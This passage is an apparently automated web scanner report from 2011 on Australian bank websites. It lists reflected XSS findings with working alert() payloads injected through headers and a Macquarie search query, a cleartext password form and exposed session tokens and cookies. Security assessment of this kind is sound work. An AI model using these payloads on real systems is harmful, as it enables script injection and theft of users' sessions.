Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html
date: Tue, 27 Sep 2011 14:21:00 GMT
x-powered-by: ASP.NET
cache-control: private
Content-Length: 18197

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<!-- InstanceBegin template="/Templates/Home_Page.dwt.asp" codeOutsideHTMLIsLocked="fa
...[SNIP]...
"text/javascript">
// Detect screen size and provide link to mobile site
var theUserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1d66c2"-alert(1)-"0e6a1ae23d";
if ((screen.width < 780) || (screen.height < 580)) {
window.location="http://m.bendigobank.com.au/index.asp";
} else if (theUserAgent.search('Mobile') >
...[SNIP]...

1.12. http://www.bendigobank.com.au/public [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/public

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50fee"-alert(1)-"1ac17246e9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /public HTTP/1.1
Host: www.bendigobank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.150fee"-alert(1)-"1ac17246e9
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bendigobank.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html
date: Tue, 27 Sep 2011 14:20:50 GMT
x-powered-by: ASP.NET
cache-control: private
Content-Length: 18197

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<!-- InstanceBegin template="/Templates/Home_Page.dwt.asp" codeOutsideHTMLIsLocked="fa
...[SNIP]...
"text/javascript">
// Detect screen size and provide link to mobile site
var theUserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.150fee"-alert(1)-"1ac17246e9";
if ((screen.width < 780) || (screen.height < 580)) {
window.location="http://m.bendigobank.com.au/index.asp";
} else if (theUserAgent.search('Mobile') >
...[SNIP]...

1.13. http://www.bendigobank.com.au/public/ [User-Agent HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bendigobank.com.au
Path:	/public/

Issue detail

The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eaa6d"-alert(1)-"5f83b1d518a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /public/ HTTP/1.1
Host: www.bendigobank.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1eaa6d"-alert(1)-"5f83b1d518a
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.bendigobank.com.au/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
p3p: CP="NON CUR OTPi OUR NOR UNI"
content-type: text/html
date: Tue, 27 Sep 2011 14:20:54 GMT
x-powered-by: ASP.NET
cache-control: private
Content-Length: 18198

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<!-- InstanceBegin template="/Templates/Home_Page.dwt.asp" codeOutsideHTMLIsLocked="fa
...[SNIP]...
"text/javascript">
// Detect screen size and provide link to mobile site
var theUserAgent = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1eaa6d"-alert(1)-"5f83b1d518a";
if ((screen.width < 780) || (screen.height < 580)) {
window.location="http://m.bendigobank.com.au/index.asp";
} else if (theUserAgent.search('Mobile') >
...[SNIP]...

2. Cleartext submission of password previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://equitylending.nab.com.au
Path:	/Login.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://equitylending.nab.com.au/Login.aspx?referrer=%2fdefault.aspx&

The form contains the following password field:

ctl00$ctl00$cBodyContainer$cBodyContainer$txtPassword

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.

Request

GET /Login.aspx?referrer=/default.aspx& HTTP/1.1
Host: equitylending.nab.com.au
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nab_pzn_tz=5; s_vnum=1317445200437%26vn%3D1; nab_pzn=58F1885E21BE4DECB5387FC555A298A8; cssCookie=Tue Sep 27 2011 09:20:57 GMT-0500 (Central Daylight Time); nab_pzn_od=P0112%2CC0013%2CP0115%2CP0115%2C; cview3=1zap79teo300.gt2z41ra.1156; WT_FPC=id=50.23.123.106-4086325760.30173190:lv=1317187955385:ss=1317187221412; s_cc=true; gpv_pN=nab%3Apersonal%3Acredit-cards%3Aapply-checklist; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 14040
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 27 Sep 2011 14:50:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head><meta http-equiv="C
...[SNIP]...
<div class="padding">
<form name="aspnetForm" method="post" action="Login.aspx?referrer=%2fdefault.aspx&" id="aspnetForm" onkeypress="return submitFormByCorrectButton(event);">
<div>
...[SNIP]...
<div class="row">Enter your NAB Equity Lending Password: <input name="ctl00$ctl00$cBodyContainer$cBodyContainer$txtPassword" type="password" id="ctl00_ctl00_cBodyContainer_cBodyContainer_txtPassword" class="standardInput" autocomplete="off" /></div>
...[SNIP]...

3. Session token in URL previous next
There are 2 instances of this issue:

http://australianewzealandb.tt.omtrdc.net/m2/australianewzealandb/mbox/standard
https://www.macquarie.com.au/mgl/au/personal/error404.htm

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

3.1. http://australianewzealandb.tt.omtrdc.net/m2/australianewzealandb/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://australianewzealandb.tt.omtrdc.net
Path:	/m2/australianewzealandb/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://australianewzealandb.tt.omtrdc.net/m2/australianewzealandb/mbox/standard?mboxHost=www.anz.com&mboxSession=1317133227582-60217&mboxPage=1317133227582-60217&screenHeight=1200&screenWidth=1920&browserWidth=1087&browserHeight=927&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=AUPersonalLeftSituational&mboxId=0&mboxTime=1317115228750&mboxURL=http%3A%2F%2Fwww.anz.com%2Fpersonal%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Faq%3Df%26gcx%3Dc%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Daustralia%2Bbank&mboxVersion=40

Request

GET /m2/australianewzealandb/mbox/standard?mboxHost=www.anz.com&mboxSession=1317133227582-60217&mboxPage=1317133227582-60217&screenHeight=1200&screenWidth=1920&browserWidth=1087&browserHeight=927&browserTimeOffset=-300&colorDepth=16&mboxCount=1&mbox=AUPersonalLeftSituational&mboxId=0&mboxTime=1317115228750&mboxURL=http%3A%2F%2Fwww.anz.com%2Fpersonal%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Faq%3Df%26gcx%3Dc%26sourceid%3Dchrome%26ie%3DUTF-8%26q%3Daustralia%2Bbank&mboxVersion=40 HTTP/1.1
Host: australianewzealandb.tt.omtrdc.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.anz.com/personal/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
pragma: no-cache
Content-Type: text/javascript
Content-Length: 595
Date: Tue, 27 Sep 2011 14:20:09 GMT
Server: Test & Target

var mboxCurrent=mboxFactories.get('default').get('AUPersonalLeftSituational',0);mboxCurrent.setEventTime('include.start');document.write('<div style="visibility: hidden; display: none" id="mboxImporte
...[SNIP]...

3.2. https://www.macquarie.com.au/mgl/au/personal/error404.htm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/error404.htm

Issue detail

The URL in the request appears to contain a session token within the query string:

https://www.macquarie.com.au/mgl/au/personal/error404.htm;jsessionid=CE16D7DA1278B5C77E26AA069A705D23?conversationId=351805

Request

GET /mgl/au/personal/error404.htm;jsessionid=CE16D7DA1278B5C77E26AA069A705D23?conversationId=351805 HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: JSESSIONID=CE16D7DA1278B5C77E26AA069A705D23; TS56ffcb=f4347a9ca922d584c07fc6127143527d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec52216cdf4e902011a5072448f; TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; PD_STATEFUL_774a22c2-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; PD_STATEFUL_553a44c4-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:36:24 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 83966
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=hGxkDHu27up0Ysu66w1t2g==;GUID=1|0PXLt2T7f_HH8EwQQo5ARTxsQt9Sy7Rxq7BC9VCb2KiyTcjuwkbdR0-XWVQt0qZ-|L21nbC9hdS9wZXJzb25hbC9lcnJvcjQwNC5odG0.
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=2ef685720266d1f49dacdc2cc647cdb336824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
Content-Length: 83966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie Personal
...[SNIP]...

4. Cookie without HttpOnly flag set previous next
There are 25 instances of this issue:

/mgl/au/personal/
/mgl/au/personal/a
/mgl/au/personal/error404.htm
/mgl/au/personal/financial-advice/strategic-wealth-management
/mgl/au/personal/js/core/jquery-1.4.2.js
/mgl/au/personal/js/core/jquery-ui-1.8.1.js
/mgl/au/personal/js/core/mac-libraries.js
/mgl/au/personal/js/swfobject.js
/mgl/au/personal/loans/home-loans
/mgl/au/personal/personal/images/ajax-loader-small.gif
/mgl/au/personal/personal/images/butonArrow.gif
/mgl/au/personal/personal/images/macquarie_personal_print_logo.gif
/mgl/au/personal/personal/images/spacer.gif
/mgl/au/personal/savings-accounts/high-interest-savings-accounts
/mgl/au/personal/search-results
/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg.ajax4jsf.javascript.AjaxScript
/mgl/au/personal/a4j_3_2_1-SNAPSHOTorg/ajax4jsf/javascript/scripts/form.js
/mgl/au/personal/credit-cards
/mgl/au/personal/financial-advice/stockbroking
/mgl/au/personal/financial-advice/stockbroking/futures
/mgl/au/personal/insurance/life-insurance/macquarie-life-active
/mgl/au/personal/retail_portal/templateProxy.htm
/mgl/au/personal/savings-accounts/term-deposits/term-deposits
/mgl/au/personal/superannuation/self-managed/equity-lever
/mgl/au/personal/trading/international-money-transfers/international-money-transfers

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

4.1. https://www.macquarie.com.au/mgl/au/personal/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=4FBE76700CC5B2A951D1717D32DDF8A7; Path=/mgl/au/personal; Secure
TS529c02=e0a150b02758db439940140941aa77aa36824e21333054354e81db99a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=b464da69b13923aacb9a28d53a47e3dd36824e21333054354e81db99a3a2c207ffffffff60ac0ec54c1932dd; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/ HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.macquarie.com.au/mgl/au
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; TS529c02=396443dfd013436898b5dc0db915a0ed36824e21333054354e81db99a3a2c207ffffffff60ac0ec51f6c9215; s_cc=true; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; s_nr=1317133286309; s_sq=mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:22:02 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 118718
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC8.
Set-Cookie: JSESSIONID=4FBE76700CC5B2A951D1717D32DDF8A7; Path=/mgl/au/personal; Secure
Set-Cookie: TS529c02=e0a150b02758db439940140941aa77aa36824e21333054354e81db99a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=b464da69b13923aacb9a28d53a47e3dd36824e21333054354e81db99a3a2c207ffffffff60ac0ec54c1932dd; Max-Age=900; Path=/mgl/au/personal
Content-Length: 118718

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie > Pers
...[SNIP]...

4.2. https://www.macquarie.com.au/mgl/au/personal/a previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/a

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=CE16D7DA1278B5C77E26AA069A705D23; Path=/mgl/au/personal; Secure
PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
TS56ffcb=f4347a9ca922d584c07fc6127143527d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec52216cdf4e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/a HTTP/1.1
Host: www.macquarie.com.au
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f

Response

HTTP/1.1 302 Moved Temporarily
content-length: 0
date: Tue, 27 Sep 2011 14:36:20 GMT
location: https://www.macquarie.com.au/mgl/au/personal/error404.htm;jsessionid=CE16D7DA1278B5C77E26AA069A705D23?conversationId=351805
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9h
Set-Cookie: JSESSIONID=CE16D7DA1278B5C77E26AA069A705D23; Path=/mgl/au/personal; Secure
Set-Cookie: PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; Path=/
Set-Cookie: TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=f4347a9ca922d584c07fc6127143527d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec52216cdf4e902011a5072448f; Max-Age=900; Path=/mgl/au/personal

4.3. https://www.macquarie.com.au/mgl/au/personal/error404.htm previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/error404.htm

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=6288C4A6B217F1BFC64551179364455F; Path=/mgl/au/personal; Secure
TS529c02=43e45c3536d34e069d7168ad6141a99d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec564c07226e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=da4c96ae87214a7cfdddddc72b3174c536824e21333054354e81db99a3a2c207ffffffff60ac0ec5f750db6a; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/error404.htm?conversationId=351802 HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage244e5%3C/script%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E17967e3e96&x=10&y=6
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; TS529c02=e52ff51d9f51295cd3c976ab4d79831536824e21333054354e81df4ca3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; s_cc=true; s_nr=1317134191152; __ppFullPath=re; s_evar24=referral%3Aburp; s_sq=mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:36:19 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 83780
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
x-hp-cam-color: V=1;ServerAddr=cf+Ihuwjl/t8tj3quRifUw==;GUID=1|K4XbXu_TjrYU0ZPoZMItn3vwG1D0tsphyMw2h1fEISPX2gmWNddGiYvhkqpNa40F|L21nbC9hdS9wZXJzb25hbC9lcnJvcjQwNC5odG0.
Set-Cookie: JSESSIONID=6288C4A6B217F1BFC64551179364455F; Path=/mgl/au/personal; Secure
Set-Cookie: PD-S-SESSION-ID=2_1mU8KcPcYuclxV-kvu+CinXJ9ffnVhmdDQHAQBw1Tek+lL3k; Path=/; Secure; HttpOnly
Set-Cookie: TS529c02=43e45c3536d34e069d7168ad6141a99d36824e21333054354e81df4ca3a2c207ffffffff60ac0ec564c07226e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
Set-Cookie: TS56ffcb=da4c96ae87214a7cfdddddc72b3174c536824e21333054354e81db99a3a2c207ffffffff60ac0ec5f750db6a; Max-Age=900; Path=/mgl/au/personal
Content-Length: 83780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Macquarie Personal
...[SNIP]...

4.4. https://www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www.macquarie.com.au
Path:	/mgl/au/personal/financial-advice/strategic-wealth-management

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=05A5DF2608AC01CC5A4CFFC499D5AC21; Path=/mgl/au/personal; Secure
TS529c02=6d3121c4af65fef40e668ee7fb3732cf36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448faac4ce84002f3168; Max-Age=900; Path=/
TS56ffcb=512364cc00d5eeddc99bfda3c4741b5e36824e21333054354e81db99a3a2c207ffffffff60ac0ec591176cf2; Max-Age=900; Path=/mgl/au/personal

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mgl/au/personal/financial-advice/strategic-wealth-management HTTP/1.1
Host: www.macquarie.com.au
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.macquarie.com.au/mgl/au/personal/search-results?portal=personal&query=xss+interest+bond+mortgage&x=10&y=6
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=BDD4123DD58BBE2234B2E6289A4970D4; TS56ffcb=2390808baf1d517ddb61854e0f3693b836824e21333054354e81db99a3a2c207ffffffff60ac0ec563d3f1d9; JSESSIONID=1FGpTBbZvpBm4sfrTbRWLZJscqVzfyj7rmGz9pWryMWdww72Tbvx!344053406; s_vi=[CS]v1|2740EDCF85010FFB-40000104C038252C[CE]; PD_STATEFUL_543a95c9-1a3a-4def-542f-00145e3c444a=%2Fmgl%2Fau%2Fpersonal; TS529c02=771e15074dbb802045577d1b4c90625e36824e21333054354e81ded2a3a2c207ffffffff60ac0ec51f6c9215e902011a5072448f; s_cc=true; s_nr=1317134084844; s_sq=mqg-personal%3D%2526pid%253Dpersonal%25253Asearch-results%2526pidt%253D1%2526oid%253Dhttps%25253A//www.macquarie.com.au/mgl/au/personal/financial-advice/strategic-wealth-management%2526ot%253DA%26mqg-inter-ccir-comau%3D%2526pid%253Dau%2526pidt%253D1%2526oid%253Dhttp%25253A//www.macquarie.com.au/mgl/au/personal%2526ot%253DA

Response

HTTP/1.1 200 OK
content-type: text/html;charset=UTF-8
date: Tue, 27 Sep 2011 14:34:25 GMT
p3p: CP="NON CUR OTPi OUR NOR UNI"
x-old-content-length: 114645
x-powered-by: Servlet 2.4; JBoss-4.3.0.GA_CP02 (build: SVNTag=JBPAPP_4_3_0_GA_CP02 date=200808051050)/JBossWeb-2.0, JSF/1.2
